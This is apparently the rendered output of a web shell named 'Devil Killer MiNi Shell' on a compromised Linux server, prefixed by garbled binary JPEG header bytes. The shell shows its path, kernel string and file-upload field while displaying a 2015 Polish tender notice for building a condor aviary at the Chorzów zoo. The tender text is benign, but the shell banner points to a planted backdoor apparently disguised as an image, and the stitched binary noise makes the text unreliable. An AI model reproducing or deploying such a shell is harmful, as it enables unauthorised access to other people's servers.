JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150227/27705-N-2015.html

<p class="kh_header"><b>Chorzów: Budowa woliery dla kondora</b><br>
<b>Numer ogłoszenia: 27705 - 2015; data zamieszczenia: 27.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Śląski Ogród Zoologiczny , ul. Promenada Gen. Jerzego Ziętka 7, 41-501 Chorzów, woj. śląskie, tel. 666 031 496.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoo.silesia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa samorządu wojewódzkiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa woliery dla kondora.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest rozbiórka istniejących starych klatek metalowych oraz budowa woliery hodowlano ekspozycyjnej dla kondora. Budowana woliera to lekka konstrukcja stalowa przekryta siatką metalową zabezpieczającą, nawiązująca formą do obiektów istniejących.  Parterowa jednonawowa hala wykonana w konstrukcji stalowej w formie łuków ustawionych na masywnych fundamentach. Konstrukcja osłonięta siatką metalową umożliwiającą ekspozycję hodowanych ptaków.  
Konstrukcja obiektu:
Parterowa, wolnostojąca jednonawowa hala stalowa. 
Konstrukcja nośna z dwuprzegubowych łuków stalowych (wycinek paraboli) o rozpiętości 14,50 m  i  strzałce 12,50 m. 
Łuki w rozstawie co 6,00 ustawione na betonowych stopach fundamentowych  i przekryte stalową siatką osłonową. 
Przygotowanie terenu:
Przed przystąpieniem do prac  rozebrać wraz z podmurówkami istniejące  klatki stalowe  oraz wytrasować i zabezpieczyć podejścia instalacji. Z uwagi na wiek obiektu oraz  brak archiwalnej dokumentacji nie wyklucza się występowanie w terenie przewodów nie ujętych w  podkładzie mapowym.
Nie przewiduje się zmian w istniejącym ukształtowaniu i odwodnieniu terenu. Zagospodarowywany   obszar posiada nawierzchnię trawiastą na podłożu przepuszczalnym. Odprowadzenie wód opadowych z nawierzchni utwardzonych zapewnić  przez nachylenie  0,2% umożliwiające odpływ wody do warstw przepuszczalnych. Nie przewiduje się zmian rzędnych wysokościowych terenu.  Zachować należy do dalszego wykorzystania istniejący drzewostan.
Fundamenty: 
Stopy  fundamentowe betonowe rozstawione co 6,00 m (zgodnie z dokumentacją rysunkową)  posadowione 150 cm poniżej   poziomu  terenu. (co najmniej 50 cm w gruncie rodzimym). 
W stopach osadzić kotwy fundamentowe  HTSM -16 do mocowania słupów konstrukcji nośnej.
Beton zaizolować przeciwwilgociowo powłoką bitumiczną. (np. Abizol)
Stopy układać na podsypce piaskowej i warstwie betonu podkładowego grubości 10 cm. 
Pomiędzy stopami podwalina żelbetowa szerokości 25 cm z betonu C16/20 posadowiona na podbudowie z gruntu niewysadzinowego jak na rysunku. W podwalinie kotwić zaczepy z L50x50x5 do naciągu lin krawędziowych i pionowych.
Konstrukcja stalowa: 
Łuki stalowe rozstawione co 6,00 m ustawione na stopach fundamentowych.
Łuki dwuprzegubowe w formie wycinka paraboli z rury stalowej  D159/5,6. 
Łuki środkowe (2 sztuki pionowe) stężone poprzecznie ryglami z  rury D101/5,6 rozmieszczonej co ok. 3,00 m.
Łuki skrajne (ukośne) z rury stalowej  D159/5,6. stężone ryglami oraz zastrzałami z rury D133/10 stanowiącymi podparcie dla podestu wiat osłonowych. 
Konstrukcja  usztywniona poprzecznie systemem rygli ściennych i stężeń typu X z pręta fi16 napinanego śrubą rzymską. Elementy stężeń  rozmieścić wg wskazań  rysunków części konstrukcyjnej projektu. 
Wszystkie elementy konstrukcji stalowej po piaskowaniu i odtłuszczeniu pokryć farbą podkładową. Do wykonania warstwy podkładowej powinna być stosowana epoksydowa antykorozyjna dwuskładnikowa farba podkładowa. Należy ją nanosić na podłoże zgodnie z wymaganiami aprobaty technicznej, przy czym grubość tej warstwy po wyschnięciu powinna wynosić nie mniej niż 60?m.
Po zamontowaniu wszystkie elementy stalowe malować dwukrotnie syntetyczną farbą  nawierzchniowa na farbie podkładowej.  Grubość pokrywy malarskiej  min 150 ?m.   Kolorystyka  wg uzgodnień z Inwestorem.
Farbę należy nakładać metodą natrysku hydrodynamicznego, pędzlem lub wałkiem na wyschniętą, odpyloną i odtłuszczoną warstwę podkładową. Powierzchnia stali powinna mieć temperaturę min. 3oC wyższą niż punkt rosy. Osłona woliery:
Siatka stalowa gabionowa heksagonalna o oczkach 50x70 z drutu fi 2,7 o podwójnym splocie  w powłoce galwanicznej zgodna z aprobatami AT/2008-03-1455/2 i ITB-1161/2009  zawieszona na konstrukcji stalowej przy pomocy systemu lin i cięgien. Siatkę łączyć w sposób ciągły na zakład dwóch oczek z przeplotem z linki stalowej w sposób uniemożliwiający wydostanie się zwierząt. Miejsca styków, mocowań lub zmian kierunków zabezpieczyć obejmami i dodatkowymi (łatami) siatki. W pasie podwaliny linkę napinającą kotwić co 150 cm do betonu .
Liny poziome - lina stalowa T1x19 D 10,0 mm o wytrzymałości drutu 1600 MPa z zachowaniem równomiernego zwisu o strzałce 10 cm.
Cięgna pionowe - lina stalowa T1x19 D 7,0 mm o wytrzymałości drutu 1600 MPa napieta siła 2 kN.
Nakrętki napinające (śruby rzymskie) i hakowe M16 wg kompletnych rozwiązań systemowych zgodnych z PN-69-69/M-80203 PN-66/M-80247 PN-67/M-80245 lub odpowiednich.
Wszystkie elementy osłony wykonać z wysokogatunkowej  stali nierdzewnej nie wymagającej dodatkowego zabezpieczenia antykorozyjnego.  
Śluza wejściowa:
Parterowa altana wykonana w konstrukcji żelbetowej. 
Ławy  fundamentowe 40 x 30  cm posadowione 100 cm poniżej poziomu terenu na wyrównawczej podsypce piaskowej gr 15 cm.  
Fundamenty z betonu C12/15 (B-15)  zbrojonego 4 wkładkami  fi 12  ze stali A-II (jak na rysunku).
W poziomie posadzki  płyta żelbetowa zatarta na gładko grubości 12 cm wykonana z betonu B-15  zbrojona siatką z wkładek  fi 12o oczkach 20x20 cm. 
Ściany żelbetowe gr 20 cm zbrojone obustronnie  siatka z wkładek fi 8 o oczkach 20x20 cm, 
Wieńce 20x20 cm z betonu B-15 zbrojone  po obwodzie 4 fi 12  
Nadproża monolityczne zbrojone wkładkami fi 12 - (2 góra ,5 dołem) i strzemionami fi 6 co 20. 
Stropodach niewentylowany na monolitycznym stropie żelbetowym. 
Płyta żelbetowa krzyżowozbrojona oparta na ścianach i nadprożach.
Płyta gr 12 cm   z betonu  klasy C16/20 (B-20)  zbrojona:
dołem siatką z wkładek fi 14  rozmieszczonych co 15 cm,
podpory górą  wkładkami fi 14  rozmieszczonymi co 15 cm
Ściany i strop tynkowane. Okładzina ścian wewnętrznych i posadzki z płytek ceramicznych szkliwionych. Cokół licowany płytkami ceramicznymi w kolorze posadzki .Połączenie powinno zostać wykonane w sposób bezszczelinowy umożliwiający mycie i dezynfekcję.  Drzwi wejściowe metalowe.
Dach  jednospadowy w systemie dachu odwróconego. Płytę nośną wykonać ze spadkiem 3%.
Nawierzchnię płyty zatrzeć na gładko lub  wykończyć  gładzią cementową. Na przygotowanym podłożu  ułożyć  warstwę izolacji przeciwwodnej  z dwóch warstw folii budowlanej lub papy modyfikowanej klejonej. Na tak przygotowanym podłożu wykonać warstwę izolacji termicznej ze styropianu  ekstrudowanego (styroporu)  grubości 20 cm.  Następnie ułożyć warstwę izolacyjną z folii polipropylenowej otwartej na dyfuzję pary wodnej (membrana półprzepuszczalna) i wykonać  podkład drenażowo wyrównawczy z mieszanki żwirowo piaskowej. Na podkładzie ułożyć powłokę geowłókniny filtrującej (nienasiąkliwej) i podłoże żwirowo kamienne. Nawierzchnię wyprofilować ze spadkami do koryt odprowadzających nadmiar wody (burze, roztopy śnieżne) poza obręb dachu.
Wykończenie obiektu.
Podłoża naturalne -  W miejscu inwestycji grunt gliniasty przewarstwiony piaskiem. W miejscach wskazanych w części rysunkowej po wykonaniu oczek wodnych usunąć ewentualne  kamienie i wyrównać podłoże warstwą piasku grubości 15 cm. Teren obsiać trawą i niskimi nasadzeniami wg zaleceń użytkownika. 
Oczka wodne -   zagłębienia terenu rozmieszczone i ukształtowane wg części rysunkowej o łącznej powierzchni ok. 40 m2
Podłoże gruntowe z warstwy piasku grubości 15 cm na istniejącym gruncie. 
Płyta nośna betonowa gr 12 cm zbrojona dołem i górą  siatką zgrzewaną fi 4 mm. 
Hydroizolacja z folii PEHD 2 mm.
Dno basenu gr 4 cm z betonu szczelnego B30   wzmocnionego zbrojeniem rozproszonym. Nawierzchnię zatrzeć masą utwardzającą np. OPTIROC ABS lub wykonać jako nawierzchnię nie pylącą. 
Osłona dla ptaków -    altana drewniana.
Do poprzeczek z rury stalowej mocować śrubami M12  deski podestu. Deski 30 mm z drewna sosnowego  impregnowanego ciśnieniowo - próżniowo impregnatem bezchromowym.  Na podeście altana zbijana z desek 25 mm na ramiaku z krawędziaków 70x70 mm. Zadaszenie z desek 25 mm przekryte 2 x papą/gont bitumiczny.  
Wyposażenie  -    drewniane i kamienne elementy wyposażenia rozmieszczone wg wskazań użytkownika. 
Aranżacja  skalna wykonana w formie pryzmy z głazów kamiennych.
Pnie i konary drzew dużej średnicy
Zachowane istniejące drzewa liściaste. 
Odprowadzenie deszczówki.
Odprowadzenie wód opadowych z nawierzchni utwardzonych zapewnić  przez nachylenie  0,2% umożliwiające odpływ wody do warstw przepuszczalnych. Nie przewiduje się zmian rzędnych wysokościowych terenu. Sezonowe odprowadzenie  wody z oczek wodnych j.w. przy pomocy ogrodowej  pompki zanurzeniowej.  
Instalacja elektryczna.
W pomieszczeniu śluzy  gniazdo 230 V (złącze kablowo rozdzielcze) służące doraźnemu podłączaniu sprzętów w czasie sprzątania wybiegów. Zasilanie złącza z sąsiedniego budynku   przy wykorzystaniu istniejącego przyłącza jako rozbudowa istniejącej instalacji 230 V. Zasilanie wykonać kablem YAKY 4x1,5mm2.
Instalacja odgromowa.
Przy każdej stopie linka stalowa prowadzona od konstrukcji stalowej łuku do instalacji uziemiającej wg szczegółów rozwiązań typowych. Zwód  fi 6mm z pręta stalowego do instalacji uziemiającej z ocynkowanej bednarki 30x4 mm ułożonej otokowo w ziemi. 
Barierka ochronna. 
Lina sizalowa D25 zawieszona na palisadzie z bali drewnianych rozmieszczona wokół woliery w odległości co najmniej  1,50 m od siatki. Pomiędzy liną i siatką niskie nasadzenia (irga) utrudniające dostęp do woliery.  Palisada z bali drewnianych o średnicy 140 mm. i wysokości 120 cm rozmieszczona wokół woliery w odległości co najmniej  1,50 m od siatki. Drewno sosnowe toczone, impregnowane ciśnieniowo - próżniowo impregnatem bezchromowym. Słupki zamocować w podłożu na głębokości min 80 cm i w strefie podziemnej dodatkowo impregnować preparatem asfaltowym. Górne krawędzie bali frezować w celu likwidacji ostrych krawędzi..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.33.00.00-9, 45.11.10.00-8, 45.26.23.00-4, 45.26.23.10-7, 45.26.25.20-2, 45.31.12.00-2, 45.44.21.00-8, 45.44.22.00-9, 45.43.10.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wymagane  w wysokości 7.000,00 zł.(siedem tysięcy)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli  Wykonawca wykaże, że w ciągu ostatnich pięciu lat przed upływem terminu składania ofert ,a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  należycie wykonał co najmniej 3 (trzy) realizacje, każda na kwotę min. 200.000,00 złotych netto (dwieście tysięcy złotych),  polegające na wykonaniu budowy obiektu z konstrukcji stalowej,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, że osoba, która będzie pełnić funkcję kierownika robót posiada uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli  Wykonawca wykaże, że w ciągu ostatnich pięciu lat przed upływem terminu składania ofert ,a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  należycie wykonał co najmniej 3 (trzy) realizacje, każda na kwotę min. 200.000,00 złotych netto (dwieście tysięcy złotych),  polegające na wykonaniu budowy obiektu z konstrukcji stalowej,;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie dotyczące oferowanych materiałów, urządzeń i wyposażenia złożone w celu uzyskania zapewnienia ze strony Wykonawcy, że wykorzysta do realizacji zamówienia materiały, urządzenia i wyposażenie o parametrach nie gorszych niż wskazane w dokumentacji projektowej oraz zestawieniu materiałów lub wykaz materiałów i urządzeń równoważnych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin rękojmi - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany ustaleń  umowy w stosunku do treści oferty Wykonawcy w następującym zakresie: 
1. wysokości wynagrodzenia w przypadku:
a.  ograniczenia zakresu prac objętych niniejszą umową w przypadku stwierdzenia braku konieczności wykonywania części zamówienia, ujętych w dokumentacji;
b. zmiany zakresu prac objętych  umową w przypadku zastosowania zmian opisanych w pkt.3. ;
2. terminu realizacji przedmiotu zamówienia, gdy zmiana jest  spowodowana:  
a. epidemią stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym,
b. skrajnie niekorzystnymi warunkami pogodowymi  uniemożliwiającymi wykonywanie prac zewnętrznych (gradobicie,  intensywne opady deszczu lub śniegu, powodzie, upały itp.) potwierdzonymi wpisem do dziennika budowy,
c. trudnościami w nabyciu materiałów lub urządzeń wynikającymi z długotrwałego spadku podaży tych towarów lub innych przyczyn niezależnych od  Stron umowy,  
d. następstwem okoliczności leżących po stronie Zamawiającego, takich jak:  utrudnienia, opóźnienia w przekazywaniu pomieszczeń, zawieszenia robót lub przeszkodami dającymi się przypisać Zamawiającemu, 
e. koniecznością wprowadzenia zmian do dokumentacji projektowej na etapie wykonawstwa robót z przyczyn niezależnych od obu Stron, aktualizacją rozwiązań projektowych z uwagi na postęp technologiczny, 
f. koniecznością wykonania robót dodatkowych, wpływających na termin wykonania robót objętych niniejszą umową podstawową, 
g. następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia,
h. katastrofą budowlaną.
3. jakości lub innych parametrów materiałów, urządzeń, zaoferowanych                 w ofercie, przy czym zmiana taka może być spowodowana:
a. niedostępnością na rynku materiałów lub urządzeń wskazanych                            w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót spowodowaną zaprzestaniem produkcji lub przedłużającym się okresem ich dostawy na plac budowy, wycofaniem z rynku tych materiałów lub urządzeń;
b. pojawieniem się na rynku materiałów lub urządzeń nowszej generacji pozwalających na: 
-	zaoszczędzenie kosztów realizacji przedmiotu umowy, kosztów eksploatacji wykonanego przedmiotu umowy, umożliwiające uzyskanie lepszej jakości robót, poprawę warunków bezpieczeństwa i eksploatacji w przyszłym obiekcie;
c. pojawieniem się technologii wykonania zaprojektowanych robót pozwalającej na:
-	zaoszczędzenie czasu realizacji inwestycji, zmniejszenie kosztów wykonywanych prac lub kosztów eksploatacji wykonanego przedmiotu umowy, uzyskanie lepszej jakości robót, poprawę warunków bezpieczeństwa i eksploatacji w przyszłym obiekcie;
d. koniecznością zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy
e. koniecznością zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub STWIOR w sytuacji, gdyby zastosowanie przewidywanych rozwiązań groziło nieterminowym wykonaniem przedmiotu umowy, z uwagi na przedłużający się proces dostarczenia materiałów i urządzeń na plac budowy; 
f. koniecznością zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa; 
g. koniecznością usunięcia sprzeczności w dokumentacji;
h. zmianami rozwiązań technologicznych ujętych w dokumentacji projektowej, spowodowanymi koniecznością wprowadzenia na etapie wykonawstwa robót modyfikacji dokumentacji projektowej podyktowanymi koniecznością racjonalizacji konkretnych rozwiązań technicznych zwiększających walory użytkowe obiektu będącego przedmiotem umowy, o ile ta modyfikacja nie zmieni parametrów inwestycji;
4.  osób przewidzianych do realizacji zamówienia przez Strony w przypadku nieprzewidzianych zdarzeń losowych min. takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków, nienależyte wykonywanie obowiązków, pod warunkiem, że osoby zaproponowane będą posiadały takie same kwalifikacje jak osoby wskazane w ofercie.
5. podwykonawcy, jeżeli podwykonawca nie wykonuje prac z należytą  starannością, uległ likwidacji, doszło do rozwiązania umowy łączącej go              z Wykonawcą.
6.   zmiany zakresu części prac powierzonych podwykonawcy w przypadku gdy:
- konieczność powierzenia przez Wykonawcę prac podwykonawcy spowodowana jest rozwiązaniem umów o pracę z pracownikami wykonującymi pracę w danej branży w takiej liczbie, która uniemożliwia realizację prac przez Wykonawcę,
- wprowadzenie nowego podwykonawcy zapewni lepszą realizację danej części zamówienia,
- konieczność powierzenia prac podwykonawcy jest wynikiem zmiany technologii robót lub materiałów,
    Jeżeli zmiana podwykonawcy  albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b Ustawy Pzp, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy Pzp Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.

7. Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego  oraz przez Wykonawcę.
 
8. Warunkiem dokonania zmian jest złożenie wniosku przez stronę inicjującą zmianę zawierającego: opis propozycji zmian wraz                                  z uzasadnieniem, obliczenie kosztów zmian zgodnie z zasadami określonymi w ust. 9, jeżeli zmiana będzie miała wpływ na wynagrodzenie wykonawcy, opis wpływu zmiany na termin wykonania umowy.
 
9. Podstawę obliczenia kosztów zmiany mającej wpływ na wynagrodzenie Wykonawcy stanowić będzie zatwierdzony przez Zamawiającego:
- projekt zamienny lub protokół nadzoru autorskiego, jeżeli zmiana wynika ze zmiany dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót,
- kosztorys ofertowy opracowany na podstawie cen jednostkowych lub danych wyjściowych do kosztorysowania przyjętych do sporządzenia kosztorysu ofertowego Wykonawcy, a w odniesieniu do nie występujących w kosztorysie ofertowym materiałów i sprzętu według cen jednostkowych zaproponowanych przez Wykonawcę, ale nie wyższych niż średnie ceny SEKOCENBUD dla kwartału poprzedzającego termin wykonania robót budowlanych dla rejonu śląskiego,         z uwzględnieniem rabatów i upustów stosowanych dla tego rodzaju robót.

